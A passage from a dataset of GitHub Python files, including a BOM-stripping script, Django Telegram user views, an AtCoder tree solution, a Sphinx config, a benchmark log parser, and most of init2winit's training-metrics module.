\" + str(partial_acc) + '\\n')\n\n        file.write('\\nPartial Component matching (F1) accuracy \\n')\n        file.write('----------------------------\\n')\n\n        for partial_type in partial_types:\n            partial_f1_match = scores[type]['partial'][partial_type]['f1']\n            partial_f1_acc = round(partial_f1_match / count, 3)\n            file.write(partial_type + \": \" + str(partial_f1_acc) + '\\n')\n    ","repo_name":"PrachiJainxD/text-to-sql","sub_path":"roberta/evaluation/evaluation_script.py","file_name":"evaluation_script.py","file_ext":"py","file_size_in_byte":31269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2487061611","text":"import os\n\n\ndef removeBom(file):\n    '''Strip the BOM bytes from a UTF-8 file'''\n    BOM = b'\\xef\\xbb\\xbf'\n    existBom = lambda s: True if s == BOM else False\n\n    f = open(file, 'rb')\n    if existBom(f.read(3)):\n        fbody = f.read()\n        # f.close()\n        with open(file, 'wb') as f:\n            f.write(fbody)\n\n\nif __name__ == '__main__':\n    for root, dirs, files in os.walk(\"./\"):\n        count = 0\n        for file in files:\n            #if file.find(\".txt\") != -1:\n            removeBom(os.path.join(root, file))\n            count += 1\n        print(count)\n","repo_name":"livejq/AutoScripts","sub_path":"python/utf8/utf8_bom_to_utf8.py","file_name":"utf8_bom_to_utf8.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"1596951455","text":"import ast\nimport json\nimport logging\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import View\nfrom apps.user.models import User as UserModel\n\nfrom apps.indicator.models import Price as PriceModel\nfrom settings import TEAM_EMOJIS\n\nlogger = logging.getLogger(__name__)\n\nclass User(View):\n    @csrf_exempt\n    def dispatch(self, request, *args, **kwargs):\n        return super(User, self).dispatch(request, *args, **kwargs)\n\n    def post(self, request, *args, **kwargs):\n        try:\n            chat_id = request.POST.get('chat_id', \"\")\n            if not len(chat_id):\n                return HttpResponse(400) # request error\n            user, u_created = 
UserModel.objects.get_or_create(telegram_chat_id=chat_id)\n\n if request.POST.get('is_subscribed', 'NA').upper() == \"TRUE\":\n user.is_subscribed = True\n elif request.POST.get('is_subscribed', 'NA').upper() == \"FALSE\":\n user.is_subscribed = False\n\n if request.POST.get('token', None):\n token = request.POST.get('token')\n user.set_subscribe_token(token)\n\n if request.POST.get('is_muted', 'NA').upper() == \"TRUE\":\n user.is_muted = True\n elif request.POST.get('is_muted', 'NA').upper() == \"FALSE\":\n user.is_muted = False\n\n if request.POST.get('risk', 'NA') in ['low', 'medium', 'high']:\n risk_string = request.POST['risk']\n user.risk = user.get_risk_value(risk_string)\n assert user.risk == user.get_risk_value()\n\n if request.POST.get('horizon', 'NA') in ['short', 'medium', 'long']:\n horizon_string = request.POST['horizon']\n user.horizon = user.get_horizon_value(horizon_string)\n assert user.horizon == user.get_horizon_value()\n\n user.save()\n\n return HttpResponse(json.dumps(user.get_telegram_settings())) # ok\n\n except Exception as e:\n logger.debug(str(e))\n return HttpResponse(json.dumps({'error':str(e)}), status=500) # server error\n\n def get(self, request, *args, **kwargs):\n\n chat_id = request.GET.get('chat_id', \"\")\n if not len(chat_id):\n return HttpResponse(400) # request error\n\n user, u_created = UserModel.objects.get_or_create(telegram_chat_id=chat_id)\n # return HttpResponse(json.dumps(user.get_telegram_settings())) # ok\n return HttpResponse(json.dumps({})) # ok\n\n\nclass Users(View):\n def dispatch(self, request, *args, **kwargs):\n return super(Users, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n # Filter for authorized users #\n\n users = UserModel.objects.filter(subscribed_since__isnull=False, is_muted=False)\n\n if request.GET.get('beta_token_valid', \"NA\").upper() == \"TRUE\":\n users = users.exclude(_beta_subscription_token__exact=\"\")\n if request.GET.get('beta_token_valid', \"NA\").upper() == \"FALSE\":\n users = users.filter(_beta_subscription_token__exact=\"\")\n\n if request.GET.get('is_ITT_team', \"NA\").upper() == \"TRUE\":\n users = users.filter(is_ITT_team=True)\n if request.GET.get('is_ITT_team', \"NA\").upper() == \"FALSE\":\n users = users.filter(is_ITT_team=False)\n\n # Filter for user preferences #\n\n risk_string = request.GET.get('risk', 'all')\n assert risk_string in ['low', 'medium', 'high', 'all']\n if risk_string is not 'all':\n users = users.filter(risk = UserModel.get_risk_value(UserModel, risk_string))\n\n horizon_string = request.GET.get('horizon', 'all')\n assert horizon_string in ['short', 'medium', 'long', 'all']\n if horizon_string is not 'all':\n users = users.filter(horizon=UserModel.get_horizon_value(UserModel, horizon_string))\n\n # Filters done, compile chat ids #\n\n chat_id_list = list(users.values_list('telegram_chat_id', flat=True))\n # return HttpResponse(json.dumps({'chat_ids': chat_id_list})) # ok\n return HttpResponse(json.dumps({})) # ok\n","repo_name":"kamleshahire/core","sub_path":"apps/api/views/v1_user.py","file_name":"v1_user.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32369569687","text":"import sys\nsys.setrecursionlimit( 10 ** 8 )\n\nN = int( input() )\nuv = [ tuple( map( int, input().split() ) ) for _ in range( N - 1 ) ]\n\nconnect = [ [] for _ in range( N ) ]\nfor u, v in uv:\n connect[ u - 1 ].append( v - 1 )\n connect[ v - 1 ].append( u - 1 
)\n\nsize = [ 0 for _ in range( N ) ]\n# size[ u ] = number of vertices in the subtree rooted at vertex u\nvisited = [ False ] * N\ndepth = [ 0 ] * N\n\ndef calc_size( v ):\n    # count the number of vertices in the subtree rooted at vertex v\n    size[ v ] += 1\n    visited[ v ] = True\n    for u in connect[ v ]:\n        if visited[ u ] == False:\n            depth[ u ] = depth[ v ] + 1\n            calc_size( u )\n            size[ v ] += size[ u ]\n\ncalc_size( 0 )\n# print( size, depth )\n\nans = [ sum( depth ) ] + [ -1 ] * ( N - 1 )\n# ans[ i ] = the answer for the i-th line\n\nfrom collections import deque\nqueue = deque( [ 0 ] )\nwhile queue:\n    v = queue.popleft()\n    ans_v = ans[ v ]\n    for u in connect[ v ]:\n        if ans[ u ] == -1:\n            ans[ u ] = ans_v - size[ u ] + ( N - size[ u ] )\n            # re-rooting from v to u moves every vertex in u's subtree 1 closer to the root,\n            # and every other vertex 1 farther from it\n            \n            queue.append( u )\n\nprint( *ans, sep = \"\\n\" )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ABC/220/abc220-f.py","file_name":"abc220-f.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8253453292","text":"import os\nimport re\nimport sys\n\nsys.path.insert(0, os.path.abspath(\"../..\"))\n\n# -- Project information -----------------------------------------------------\n\nproject = \"mutapath\"\ncopyright = \"2023, 'matfax'\"\nauthor = \"'matfax'\"\n\nrelease = re.sub(\"^v\", \"\", os.popen(\"git describe --tags\").read().strip())\nversion = release\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n    \"m2r2\",\n    \"sphinx.ext.autodoc\",\n    \"sphinx.ext.coverage\",\n    \"sphinx.ext.napoleon\",\n    \"sphinx.ext.autosectionlabel\",\n    \"sphinx.ext.autosummary\",\n    \"sphinx_rtd_theme\",\n    \"sphinx.ext.linkcode\",\n    \"sphinx.ext.intersphinx\",\n    \"docs.attributes\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages.  See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"sphinx_rtd_theme\"\n\nhtml_css_files = [\n    \"style.css\",\n]\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. 
They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"static\"]\n\nmaster_doc = \"index\"\n\nm2r_parse_relative_links = True\nm2r_anonymous_references = True\n\nautoclass_content = \"both\"\nautodoc_mock_imports = [\"shutil\", \"pathlib\", \"os\", \"filelock\", \"path\"]\nautosectionlabel_prefix_document = True\nautosummary_generate = True\nautosummary_imported_members = True\n\nintersphinx_mapping = {\n \"python\": (\"https://docs.python.org/3\", None),\n \"path\": (\"https://path.readthedocs.io/en/stable/\", None),\n \"filelock\": (\"https://py-filelock.readthedocs.io/en/latest/\", None),\n}\n\n\ndef linkcode_resolve(domain, info):\n if domain != \"py\":\n return None\n if not info[\"module\"]:\n return None\n filename = info[\"module\"].replace(\".\", \"/\")\n return \"https://github.com/matfax/mutapath/blob/main/mutapath/%s.py\" % filename\n","repo_name":"matfax/mutapath","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25625836358","text":"from curses.ascii import isdigit, isspace\nfrom lib2to3.pgen2 import token\nimport pathlib\nimport os\nimport sys\nimport getopt\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch import true_divide\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text # or whatever\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef handle( container, index, root):\n print(root)\n block = container[index]\n res = []\n if index == 0:\n for line in block:\n tokens = line.split()\n if tokens[0] == root:\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n if tokens[0].endswith(':'):\n res.append(tokens[1])\n elif index == 1:\n flick = False\n for line in block:\n tokens = line.split()\n if flick:\n res.append(tokens)\n if tokens[0] == '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------':\n flick = True\n elif index == 2:\n flick = False\n for line in block:\n tokens = line.split()\n if flick:\n res.append(tokens)\n if tokens[0] == '------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------':\n flick = True\n elif index == 3:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n elif is_number(token[:-1]):\n res.append(token[:-1])\n elif index == 4:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n elif is_number(token[:-1]):\n res.append(token[:-1])\n elif index == 6:\n for line in block:\n tokens = line.split()\n for token in tokens:\n if is_number(token) or token.endswith('0K'):\n res.append(token)\n \n return res\n \ndef getOp(root, dataPath):\n rempref = root.removeprefix(dataPath)\n remsuff = rempref.split(',')[0]\n return remsuff\n\ndef handleData(dataPath, processedRes, drawFile):\n files = os.listdir(dataPath)\n for file in files:\n filePath = dataPath+str(file)\n f = open(filePath, 'r')\n op = getOp( filePath, 
dataPath + 'bmk_')\n    \n    lines = f.readlines()\n    cntEmpty = 0\n    lineN = 0\n    block = []\n    container = []\n    lib = []\n\n    for line in lines:\n        lineN += 1\n        if line.isspace():\n            cntEmpty += 1\n            if len(block) != 0:\n                container.append(block)\n                block = []\n            continue\n        #if line != 'Initializing RocksDB Options from the specified file\\n' and line != 'Initializing RocksDB Options from command-line flags\\n':\n        block.append(line)\n\n    with open(processedRes + str(file)+'.txt','w') as f:\n        for i in range(0, len(container)):\n            filtRes = handle(container, i, op)\n            print(str(filtRes), file=f) \n\nif __name__ == '__main__':\n    n = len(sys.argv)\n    dirName = str(sys.argv[1])\n    \n    dataPath = str(os.getcwd()) + '/'+ dirName + '/'\n    processedRes = str(os.getcwd()) + '/processed_' + dirName + '/'\n    drawFile = str(os.getcwd()) + '/'+ dirName + '/' + 'collectedList'\n    print(dataPath, dirName, processedRes)\n    \n    if not (os.path.exists(processedRes)):\n        os.makedirs(processedRes)\n\n    handleData(dataPath, processedRes, drawFile)","repo_name":"108062138/filterIndepData","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33987314167","text":"import csv\nwith open('output_5_test.txt', 'r') as file:\n\treader = csv.reader(file, delimiter=\" \") # delimiter is the one-character string \" \" (a single space) used as the field separator\n\td = list(reader) # creates a list in variable d containing the elements in reader\noutput = open('output_5_test_clean.txt', 'w')\n\t\nn=0\nreplace=0\n\nfor element in d:\n\tline = d[n]\n\tm=0\n\tfor word in line:\n\t\treplace=0\n\t\tfor letter in word:\n\t\t\tif letter=='_':\n\t\t\t\thead, middle, tail = word.partition('_')\n\t\t\t\treplace=1\t\n\t\tif replace==1:\n\t\t\toutput.write(str(head)+' ')\n\t\telse:\n\t\t\toutput.write(str(word)+' ')\n\toutput.write('\\n')\n\tn=n+1\noutput.close()","repo_name":"matthewberryman/somerton-man","sub_path":"Python/Cleanup/cleanup_test.py","file_name":"cleanup_test.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74317857049","text":"import operator\n\nfrom flax.core import freeze\nfrom init2winit.hessian.precondition import make_diag_preconditioner\nfrom init2winit.model_lib import model_utils\nfrom init2winit.optimizer_lib import utils as optimizer_utils\nfrom init2winit.utils import total_tree_norm_l2\nfrom init2winit.utils import total_tree_norm_sql2\nfrom init2winit.utils import total_tree_sum\nimport jax\nimport jax.numpy as jnp\nfrom ml_collections import ConfigDict\n\n# The TrainingMetricsGrabber configs will be these defaults overridden\n# by any overrides passed to TrainingMetricsGrabber.create.\n# See the class doc string for an overview of the keys and what they mean.\nDEFAULT_CONFIG = ConfigDict({\n    'ema_beta': 0.9,\n    'enable_train_cost': False,\n    'enable_param_norms': False,\n    'enable_gradient_norm': False,\n    'enable_all_gradient_norms': False,\n    'enable_batch_stats_norm': False,\n    'enable_all_batch_stats_norms': False,\n    'enable_update_norm': False,\n    'enable_update_norms': False,\n    'enable_preconditioner_normsq': False,\n    'enable_semip_grad_normsq': False,\n    'enable_ema': False,\n    'optstate_sumsq_fields': [],\n    'optstate_sumsq_param_wise_fields': [],\n    'optstate_sum_fields': [],\n    'optstate_sum_param_wise_fields': [],\n    'enable_grafting_norms': False,\n})\n\n\ndef 
make_training_metrics(num_train_steps, hps, **config_overrides):\n  \"\"\"Creates functions for managing training metrics.\n\n  Training metrics are handled in a functional, \"jax-onic\" way, similar to\n  optax optimizers: there is a state pytree (whose precise structure depends\n  on the config settings), and a set of functions to manipulate that state.\n\n  The three functions are:\n    (1) an initializer, which initializes the training metrics state\n      (given the network param shapes);\n    (2) an updater, which updates the training metrics state; and\n    (3) a summarizer, which summarizes the training metrics state into a summary\n      tree.\n\n  The behavior of these functions is customizable via the configs. The\n  final configs used to configure the training metrics functionality are a\n  combination of (1) the default configs in DEFAULT_CONFIG, and (2) the\n  config overrides passed as arguments to this function.\n\n  The config keys and their meanings are:\n    - enable_train_cost (bool): if true, the metrics state will have a field\n      \"train_cost\" which is a jnp array of length num_train_steps, and which\n      stores the train cost at every step of training (padded by zeros).\n    - enable_param_norms (bool): if true, the metrics state will have a field\n      \"param_norms\" which is a pytree in the shape of the model params whose\n      leaves are jnp arrays of length num_train_steps.\n    - enable_gradient_norm (bool) if true, the metrics state will have a field\n      \"gradient_norm\" which is a jnp array of length num_train_steps\n      containing a time series of the overall gradient norm.\n    - enable_update_norm (bool) if true, the metrics state will have a field\n      \"update_norm\" which is a jnp array of length num_train_steps containing\n      a time series of the overall update norm.\n    - enable_update_norms (bool) if true, the metrics state will have a field\n      \"update_norms\" which is a pytree in the shape of the model params whose\n      leaves are jnp arrays of length num_train_steps.\n    - enable_ema (bool): if true, the metrics state will have fields \"grad_ema\",\n      \"grad_sq_ema\", \"update_ema\", and \"update_sq_ema\" containing\n      exponential moving averages of the gradient, update, elementwise squared\n      gradient, and elementwise squared update; and the summary tree will\n      contain estimates of the gradient variance and update variance.\n    - ema_beta (float): if enable_ema=true, the EMA's will use this value for\n      their \"beta\" averaging parameter.\n    - optstate_sumsq_fields (list of str): record the squared Euclidean norm of\n      each of these fields in the optimizer state. If this list is non-empty,\n      the metrics state will have a field \"optstate_sumsq\" which is a dict\n      where each key is a field name in optstate_sumsq_fields, and each\n      value is a jnp array of length num_time_steps containing the time\n      series of the normsq of this optstate field.\n    - optstate_sumsq_param_wise_fields (list of str): record the sum of squares \n      of each of these fields in the optimizer state parameter wise. \n      If this list is non-empty, the metrics state will have a field \n      \"optstate_sumsq_param_wise\" which is a dict where each key is a field \n      name in optstate_sumsq_param_wise_fields, and each value is a pytree of the same type\n      as params but with each leaf a jnp array of length num_time_steps \n      containing the time series of the sum of this optstate field for this \n      parameter.\n    - optstate_sum_fields (list of str): record the sum of each of these fields\n      in the optimizer state. 
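(Added illustrative note: with an optax-style Adam state, listing a field such as \"nu\" here would record, at each step, the elementwise sum of the second-moment accumulator.) 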
If this list is non-empty, the metrics state\n      will have a field \"optstate_sum\" which is a dict where each key is a\n      field name in optstate_sum_fields, and each value is a jnp array\n      of length num_time_steps containing the time series of the sum\n      of this optstate field.\n    - optstate_sum_param_wise_fields (list of str): record the sum of each of \n      these fields in the optimizer state parameter wise. If this list is \n      non-empty, the metrics state will have a field \n      \"optstate_sum_param_wise\" which is a dict where each key is a field \n      name in optstate_sum_param_wise_fields, and each value is a pytree of the same type\n      as params but with each leaf a jnp array of length num_time_steps \n      containing the time series of the sum of this optstate field for this \n      parameter.\n    - enable_preconditioner_normsq (bool): if true, the metrics state will have\n      a field \"preconditioner_normsq\" which is a jnp array of length\n      num_train_steps containing a time series of the squared L2 norm of the\n      preconditioner. Adaptive optimizers only. See the function\n      make_diag_preconditioner() in hessian/precondition.py for more\n      info on which optimizers are supported.\n    - enable_semip_grad_normsq (bool): if true, the metrics state will have\n      a field \"semip_grad_normsq\" which is a jnp array of length\n      num_train_steps containing a time series of the squared L2 norm of the\n      \"semi-preconditioned\" gradient. Adaptive optimizers only.\n    - enable_grafting_norms (bool): if true, the metrics state will have two \n      fields \"mag_norms\" and \"dir_norms\" which are pytrees in the shape of the\n      model params whose leaves are jnp arrays of length num_train_steps. This\n      will only work when you are using the grafting operation through \n      the kitchen_sink API.\n\n  Args:\n    num_train_steps: (int) the number of steps of training. We use this to\n      determine the shape of the arrays that store per-step time series.\n    hps (ConfigDict): the init2winit hps.\n    **config_overrides: optional overrides for the training_metrics configs.\n      Config keys which are not overridden will retain their default values.\n\n  Returns:\n    init_fn: (function) initializes the training metrics state\n    update_fn: (function) updates the training metrics state\n    summarize_fn: (function): summarizes the training metrics state\n  \"\"\"\n\n  config = ConfigDict(DEFAULT_CONFIG)\n  config.update(config_overrides)\n\n  def init_fn(params, batch_stats):\n    \"\"\"Initialize the training metrics state.\n\n    Args:\n      params: (pytree) A pytree of model parameters. Used for its shape\n        information.\n      batch_stats: (pytree) A pytree of batch stats. Used for its shape\n        information.\n\n    Returns:\n      metrics_state: (pytree): The initial training metrics state. 
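(Added note: every enabled per-step series is preallocated as\n        jnp.zeros(num_train_steps) and later written in place by update_fn via\n        .at[step].set(...), so the state's shape stays fixed for the whole run.) 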
This is\n a pytree whose keys are the different training metrics; many of the\n corresponding values are pytrees of the same shape as the model params,\n though some are just scalars.\n \"\"\"\n metrics_state = {}\n metrics_state['param_norm'] = jnp.zeros(num_train_steps)\n if config['enable_train_cost']:\n metrics_state['train_cost'] = jnp.zeros(num_train_steps)\n if config['enable_param_norms']:\n metrics_state['param_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_batch_stats_norm']:\n metrics_state['batch_stats_norm'] = jnp.zeros(num_train_steps)\n if config['enable_all_batch_stats_norms']:\n metrics_state['all_batch_stats_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), batch_stats)\n if config['enable_gradient_norm']:\n metrics_state['gradient_norm'] = jnp.zeros(num_train_steps)\n if config['enable_all_gradient_norms']:\n metrics_state['all_gradient_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_update_norm']:\n metrics_state['update_norm'] = jnp.zeros(num_train_steps)\n if config['enable_update_norms']:\n metrics_state['update_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_ema']:\n metrics_state['grad_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['grad_sq_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['update_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['update_sq_ema'] = jax.tree_map(jnp.zeros_like, params)\n if config['optstate_sumsq_fields']:\n metrics_state['optstate_sumsq'] = {\n field_name: jnp.zeros(num_train_steps)\n for field_name in config['optstate_sumsq_fields']\n }\n if config['optstate_sumsq_param_wise_fields']:\n metrics_state['optstate_sumsq_param_wise'] = {\n field_name: jax.tree_map(lambda x: jnp.zeros(num_train_steps), params)\n for field_name in config['optstate_sumsq_param_wise_fields']\n }\n if config['optstate_sum_fields']:\n metrics_state['optstate_sum'] = {\n field_name: jnp.zeros(num_train_steps)\n for field_name in config['optstate_sum_fields']\n }\n if config['optstate_sum_param_wise_fields']:\n metrics_state['optstate_sum_param_wise'] = {\n field_name: jax.tree_map(lambda x: jnp.zeros(num_train_steps), params)\n for field_name in config['optstate_sum_param_wise_fields']\n }\n if config['enable_preconditioner_normsq']:\n metrics_state['preconditioner_normsq'] = jnp.zeros(num_train_steps)\n if config['enable_semip_grad_normsq']:\n metrics_state['semip_grad_normsq'] = jnp.zeros(num_train_steps)\n if config['enable_grafting_norms']:\n metrics_state['mag_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n metrics_state['dir_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n return metrics_state\n\n def update_fn(metrics_state, step, train_cost, grad, old_params, new_params,\n optimizer_state, batch_stats):\n \"\"\"Update the training metrics state.\n\n Args:\n metrics_state: (pytree) The current training metrics state.\n step: (int) the global step of training.\n train_cost: (float) The current train cost.\n grad: (pytree, of same shape as params): The current gradient.\n old_params: (pytree, of same shape as params): The parameters before the\n update.\n new_params: (pytree, of same shape as params): The parameters after the\n update.\n optimizer_state: the optax optimizer state.\n batch_stats: batch stats\n\n Returns:\n next_metrics_state: (pytree) The next training metrics state.\n \"\"\"\n param_norm = 
jax.tree_map(_compute_leaf_norms, old_params)\n grad_norm = jax.tree_map(_compute_leaf_norms, grad)\n batch_stats_norm = jax.tree_map(_compute_leaf_norms, batch_stats)\n if (config['enable_update_norm'] or config['enable_update_norms'] or\n config['enable_ema']):\n update = jax.tree_map(lambda x, y: x - y, old_params, new_params)\n else:\n update = None\n\n next_metrics_state = {}\n next_metrics_state['param_norm'] = metrics_state['param_norm'].at[\n step].set(total_tree_norm_l2(param_norm))\n if config['enable_train_cost']:\n next_metrics_state['train_cost'] = metrics_state['train_cost'].at[\n step].set(train_cost)\n if config['enable_param_norms']:\n next_metrics_state['param_norms'] = _set_pytree_idx(\n metrics_state['param_norms'], param_norm, step)\n if config['enable_batch_stats_norm']:\n next_metrics_state['batch_stats_norm'] = metrics_state[\n 'batch_stats_norm'].at[step].set(\n total_tree_norm_l2(batch_stats))\n if config['enable_all_batch_stats_norms']:\n next_metrics_state['all_batch_stats_norms'] = _set_pytree_idx(\n metrics_state['all_batch_stats_norms'], batch_stats_norm, step)\n if config['enable_gradient_norm']:\n next_metrics_state['gradient_norm'] = metrics_state['gradient_norm'].at[\n step].set(total_tree_norm_l2(grad))\n if config['enable_all_gradient_norms']:\n next_metrics_state['all_gradient_norms'] = _set_pytree_idx(\n metrics_state['all_gradient_norms'], grad_norm, step)\n if config['enable_update_norm']:\n next_metrics_state['update_norm'] = metrics_state['update_norm'].at[\n step].set(total_tree_norm_l2(update))\n if config['enable_update_norms']:\n update_norm = jax.tree_map(_compute_leaf_norms, update)\n next_metrics_state['update_norms'] = _set_pytree_idx(\n metrics_state['update_norms'], update_norm, step)\n if config['enable_ema']:\n beta = config['ema_beta']\n grad_sq = jax.tree_map(jnp.square, grad)\n update_sq = jax.tree_map(jnp.square, update)\n next_metrics_state['grad_ema'] = _advance_ema(\n metrics_state['grad_ema'], grad, beta)\n next_metrics_state['grad_sq_ema'] = _advance_ema(\n metrics_state['grad_sq_ema'], grad_sq, beta)\n next_metrics_state['update_ema'] = _advance_ema(\n metrics_state['update_ema'], update, beta)\n next_metrics_state['update_sq_ema'] = _advance_ema(\n metrics_state['update_sq_ema'], update_sq, beta)\n if config['optstate_sumsq_fields']:\n next_metrics_state['optstate_sumsq'] = {}\n for field_name in config['optstate_sumsq_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = total_tree_norm_sql2(field)\n next_metrics_state['optstate_sumsq'][field_name] = metrics_state[\n 'optstate_sumsq'][field_name].at[step].set(field_normsq)\n if config['optstate_sumsq_param_wise_fields']:\n next_metrics_state['optstate_sumsq_param_wise'] = {}\n for field_name in config['optstate_sumsq_param_wise_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = jax.tree_map(_compute_leaf_norms, field)\n field_normsqs = jax.tree_map(jnp.square, field_normsq)\n next_metrics_state['optstate_sumsq_param_wise'][field_name] = (\n _set_pytree_idx(\n metrics_state['optstate_sumsq_param_wise'][field_name],\n field_normsqs,\n step,\n )\n )\n if config['optstate_sum_fields']:\n next_metrics_state['optstate_sum'] = {}\n for field_name in config['optstate_sum_fields']:\n field = 
optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = total_tree_sum(field)\n next_metrics_state['optstate_sum'][field_name] = metrics_state[\n 'optstate_sum'][field_name].at[step].set(field_normsq)\n if config['optstate_sum_param_wise_fields']:\n next_metrics_state['optstate_sum_param_wise'] = {}\n for field_name in config['optstate_sum_param_wise_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_sums = jax.tree_map(jnp.sum, field)\n next_metrics_state['optstate_sum_param_wise'][field_name] = (\n _set_pytree_idx(\n metrics_state['optstate_sum_param_wise'][field_name],\n field_sums,\n step,\n )\n )\n if (config['enable_preconditioner_normsq'] or\n config['enable_semip_grad_normsq']):\n preconditioner = freeze(\n make_diag_preconditioner(hps['optimizer'], hps['opt_hparams'],\n optimizer_state, ConfigDict({})))\n if config['enable_preconditioner_normsq']:\n normsq = total_tree_norm_sql2(preconditioner)\n next_metrics_state['preconditioner_normsq'] = metrics_state[\n 'preconditioner_normsq'].at[step].set(normsq)\n if config['enable_semip_grad_normsq']:\n semip_grad = jax.tree_map(lambda g, p: g / (p**0.5),\n grad, preconditioner)\n semip_grad_normsq = total_tree_norm_sql2(semip_grad)\n next_metrics_state['semip_grad_normsq'] = metrics_state[\n 'semip_grad_normsq'].at[step].set(semip_grad_normsq)\n if config['enable_grafting_norms']:\n mag_norm = optimizer_utils.extract_field(optimizer_state, 'mag_norm')\n if mag_norm is None:\n raise ValueError('optimizer state has no field {}'.format('mag_norm'))\n mag_norm = freeze(mag_norm)\n next_metrics_state['mag_norms'] = _set_pytree_idx(\n metrics_state['mag_norms'], mag_norm, step)\n dir_norm = optimizer_utils.extract_field(optimizer_state, 'dir_norm')\n if dir_norm is None:\n raise ValueError('optimizer state has no field {}'.format('dir_norm'))\n dir_norm = freeze(dir_norm)\n next_metrics_state['dir_norms'] = _set_pytree_idx(\n metrics_state['dir_norms'], dir_norm, step)\n\n return next_metrics_state\n\n def summarize_fn(metrics_state):\n \"\"\"Construct a summary tree based on the current training metrics state.\n\n Args:\n metrics_state: (pytree) The current training metrics state.\n\n Returns:\n summary_tree: (pytree) A summary of the training metrics state.\n \"\"\"\n\n # this dict will map from \"summary key\" to \"pytree of same shape as params\"\n summary = {}\n\n summary['param_norm'] = metrics_state['param_norm']\n\n if config['enable_ema']:\n\n def compute_var(first_moment, second_moment):\n return (second_moment - first_moment**2).sum()\n\n summary['grad_var'] = jax.tree_map(compute_var,\n metrics_state['grad_ema'],\n metrics_state['grad_sq_ema'])\n\n summary['update_var'] = jax.tree_map(compute_var,\n metrics_state['update_ema'],\n metrics_state['update_sq_ema'])\n\n summary['update_ratio'] = jax.tree_map(operator.truediv,\n summary['update_var'],\n metrics_state['param_norm'])\n\n # This dict will map from \"summary key\" to \"flattened pytree of same shape\n # as params.\"\n flat_summary = _map_values(model_utils.flatten_dict, summary)\n\n return flat_summary\n\n return init_fn, update_fn, summarize_fn\n\n\ndef _map_values(f, dictionary):\n \"\"\"Create a new dict by mapping all the values in a dict through f.\"\"\"\n return {k: f(v) for (k, v) in dictionary.items()}\n\n\ndef 
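_example_metrics_usage(params, batch_stats, per_step_values, hps):\n  \"\"\"Added usage sketch (editor's addition; not part of the original module).\n\n  Illustrates how the three functions returned by make_training_metrics are\n  wired together. Here per_step_values is a hypothetical sequence of\n  (train_cost, grad, old_params, new_params, optimizer_state) tuples; a real\n  train loop would produce these values step by step.\n  \"\"\"\n  init_fn, update_fn, summarize_fn = make_training_metrics(\n      len(per_step_values), hps, enable_train_cost=True,\n      enable_gradient_norm=True)\n  metrics_state = init_fn(params, batch_stats)\n  for step, (cost, grad, old_p, new_p, opt_state) in enumerate(per_step_values):\n    metrics_state = update_fn(metrics_state, step, cost, grad, old_p, new_p,\n                              opt_state, batch_stats)\n  return summarize_fn(metrics_state)\n\n\ndef 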
